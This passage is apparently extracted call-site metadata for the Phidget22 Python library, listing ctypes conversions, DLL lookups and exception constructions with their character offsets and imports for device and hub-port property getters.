'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (14827, 14829), False, 'import ctypes\\n'), ((15097, 15118), 'ctypes.c_int', 'ctypes.c_int', (['IsLocal'], {}), '(IsLocal)\\n', (15109, 15118), False, 'import ctypes\\n'), ((15341, 15355), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (15353, 15355), False, 'import ctypes\\n'), ((15629, 15651), 'ctypes.c_int', 'ctypes.c_int', (['IsRemote'], {}), '(IsRemote)\\n', (15641, 15651), False, 'import ctypes\\n'), ((16078, 16102), 'ctypes.c_uint32', 'ctypes.c_uint32', (['timeout'], {}), '(timeout)\\n', (16093, 16102), False, 'import ctypes\\n'), ((16332, 16349), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\\n', (16347, 16349), False, 'import ctypes\\n'), ((16665, 16682), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (16680, 16682), False, 'import ctypes\\n'), ((16984, 17001), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (16999, 17001), False, 'import ctypes\\n'), ((17613, 17630), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (17628, 17630), False, 'import ctypes\\n'), ((17944, 17961), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (17959, 17961), False, 'import ctypes\\n'), ((18285, 18302), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\\n', (18300, 18302), False, 'import ctypes\\n'), ((18632, 18646), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (18644, 18646), False, 'import ctypes\\n'), ((531, 589), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\\n', (549, 589), False, 'import ctypes\\n'), ((623, 679), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\\n', (639, 679), False, 'import ctypes\\n'), ((782, 840), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\\n', (800, 840), False, 'import ctypes\\n'), ((874, 930), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\\n', (890, 930), False, 'import ctypes\\n'), ((1032, 1125), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\\n ctypes.c_char_p)\\n', (1050, 1125), False, 'import ctypes\\n'), ((1154, 1245), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\\n ctypes.c_char_p)\\n', (1170, 1245), False, 'import ctypes\\n'), ((1350, 1425), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\\n', (1368, 1425), False, 'import ctypes\\n'), ((1467, 1540), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\\n', (1483, 1540), False, 'import ctypes\\n'), ((2012, 2032), 'ctypes.byref', 'ctypes.byref', (['_value'], {}), '(_value)\\n', (2024, 2032), False, 'import ctypes\\n'), ((2116, 2139), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (2137, 2139), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((2204, 2229), 'ctypes.byref', 'ctypes.byref', (['self.handle'], {}), '(self.handle)\\n', (2216, 2229), False, 'import ctypes\\n'), ((2275, 2296), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['res'], {}), '(res)\\n', (2291, 2296), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((4806, 4829), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (4827, 4829), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((4934, 4958), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (4950, 4958), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((5052, 5075), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (5073, 5075), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((5154, 5183), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersion'], {}), '(_LibraryVersion)\\n', (5166, 5183), False, 'import ctypes\\n'), ((5212, 5236), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (5228, 5236), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((5389, 5412), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (5410, 5412), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((5497, 5532), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersionNumber'], {}), '(_LibraryVersionNumber)\\n', (5509, 5532), False, 'import ctypes\\n'), ((5561, 5585), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (5577, 5585), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((5688, 5711), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (5709, 5711), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((5814, 5838), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (5830, 5838), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((5906, 5929), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (5927, 5929), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((6015, 6038), 'ctypes.byref', 'ctypes.byref', (['_Attached'], {}), '(_Attached)\\n', (6027, 6038), False, 'import ctypes\\n'), ((6067, 6091), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (6083, 6091), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((6182, 6205), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (6203, 6205), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((6290, 6312), 'ctypes.byref', 'ctypes.byref', (['_Channel'], {}), '(_Channel)\\n', (6302, 6312), False, 'import ctypes\\n'), ((6341, 6365), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (6357, 6365), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((6471, 6494), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (6492, 6494), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((6616, 6640), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (6632, 6640), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((6716, 6739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (6737, 6739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((6829, 6856), 'ctypes.byref', 'ctypes.byref', (['_ChannelClass'], {}), '(_ChannelClass)\\n', (6841, 6856), False, 'import ctypes\\n'), ((6885, 6909), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (6901, 6909), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((7025, 7048), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (7046, 7048), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((7142, 7173), 'ctypes.byref', 'ctypes.byref', (['_ChannelClassName'], {}), '(_ChannelClassName)\\n', (7154, 7173), False, 'import ctypes\\n'), ((7202, 7226), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (7218, 7226), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((7352, 7375), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (7373, 7375), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((7464, 7490), 'ctypes.byref', 'ctypes.byref', (['_ChannelName'], {}), '(_ChannelName)\\n', (7476, 7490), False, 'import ctypes\\n'), ((7519, 7543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (7535, 7543), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((7669, 7692), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (7690, 7692), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((7785, 7815), 'ctypes.byref', 'ctypes.byref', (['_ChannelSubclass'], {}), '(_ChannelSubclass)\\n', (7797, 7815), False, 'import ctypes\\n'), ((7844, 7868), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (7860, 7868), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((7932, 7955), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (7953, 7955), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8062, 8086), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8078, 8086), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\\n', (8333, 8341), False, 'import ctypes\\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), '(_DeviceClass)\\n', (8614, 8628), False, 'import ctypes\\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\\n', (8922, 8940), False, 'import ctypes\\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\\n', (9230, 9241), False, 'import ctypes\\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\\n', (9520, 9534), False, 'import ctypes\\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\\n', (9884, 9898), False, 'import ctypes\\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\\n', (10149, 10162), False, 'import ctypes\\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\\n', (10479, 10500), False, 'import ctypes\\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10737, 10739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\\n', (11102, 11114), False, 'import ctypes\\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\\n', (11413, 11429), False, 'import ctypes\\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\\n', (11689, 11695), False, 'import ctypes\\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\\n', (11991, 12001), False, 'import ctypes\\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12321, 12329), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\\n', (12530, 12545), False, 'import ctypes\\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\\n', (12831, 12846), False, 'import ctypes\\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\\n', (13425, 13443), False, 'import ctypes\\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13750, 13788), 'ctypes.byref', 'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\\n', (13762, 13788), False, 'import ctypes\\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\\n', (14073, 14085), False, 'import ctypes\\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\\n', (14374, 14392), False, 'import ctypes\\n'), ((14421, 14445), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\\n', (14962, 14972), False, 'import ctypes\\n'), ((15001, 15025), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15017, 15025), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\\n', (15489, 15500), False, 'import ctypes\\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\\n', (16481, 16490), False, 'import ctypes\\n'), ((16519, 16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\\n', (16822, 16839), False, 'import ctypes\\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17125, 17150), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\\n', (17137, 17150), False, 'import ctypes\\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\\n', (17494, 17507), False, 'import ctypes\\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\\n', (17770, 17787), False, 'import ctypes\\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\\n', (18103, 18122), False, 'import ctypes\\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\\n', (18446, 18467), False, 'import ctypes\\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (18680, 18682), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((18786, 18827), 'ctypes.byref', 'ctypes.byref', (['_VINTDeviceSupportsSetSpeed'], {}), '(_VINTDeviceSupportsSetSpeed)\\n', (18798, 18827), False, 'import ctypes\\n'), ((18856, 18880), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (18872, 18880), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((19054, 19077), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (19075, 19077), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((19168, 19194), 'ctypes.byref', 'ctypes.byref', (['_deviceLabel'], {}), 